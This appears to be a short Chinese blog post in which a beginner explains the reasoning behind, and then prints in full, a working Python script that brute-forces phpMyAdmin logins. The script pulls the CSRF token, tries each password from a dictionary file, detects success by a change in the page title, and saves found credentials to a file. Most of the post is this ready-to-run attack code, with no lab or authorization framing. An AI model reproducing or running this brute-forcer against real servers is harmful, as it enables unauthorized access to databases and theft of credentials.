爆破phpmyadmin
- 因为是第一次写脚本,所以没有爆破phpmyadmin的思路
- 后来百度到很多爆破phpmyadmin的脚本,找到了一些思路
- 大概就是用python构造对phpmyadmin的登录请求,根据登录前后的源码中的一些不同的信息判断是否登录成功,我们又从发送的请求包中获取了请求参数,以及文件头信息·pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4cccba4055e
- 思路逐渐开始清晰,通过定义url user passdic(密码字典) headers session token
- 重复获取token以及获取的title的信息
- 构造payload发送请求
- 对登录前后title的信息进行比对re.findall
import html
import re
import requests
url = 'http://url/index.php'
user = 'root'
passdic = '字典路径'
s = requests.session()
s.headers = {'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
def get_token(text) -> str:
token = re.findall("name=\"token\" value=\"(.*?)\" />", text)
return html.unescape(token[0]) if token else None
def get_title(text) -> str:
title = re.findall('<title>(.*)</title>', text)
return title[0] if title else None
def try_login(user, pwd, token):
data = {'pma_username': user,
'pma_password': pwd,
'server': 1,
'target': 'index.php',
'token': token
}
r = s.post(url, data=data)
return r.text
def fuck_pma():
with open(passdic, 'r', encoding='utf-8') as f:
html = try_login('', '', '')
title_fail = get_title(html)
token = get_token(html)
for line in f:
pwd = line.strip()
print(f'[?] 尝试登陆 {user} {pwd} ')
html = try_login(user, pwd, token)
title = get_title(html)
token = get_token(html)
if title != title_fail:
print(f'[√] 登陆成功 {title}')
with open('success.txt', 'a', encoding='utf-8') as f:
f.write(f'{url} | {user} | {pwd}\n')
break
else:
print(f'[×] 登陆失败 {title}')
if __name__ == "__main__":
try:
fuck_pma()
except Exception as e:
print(e)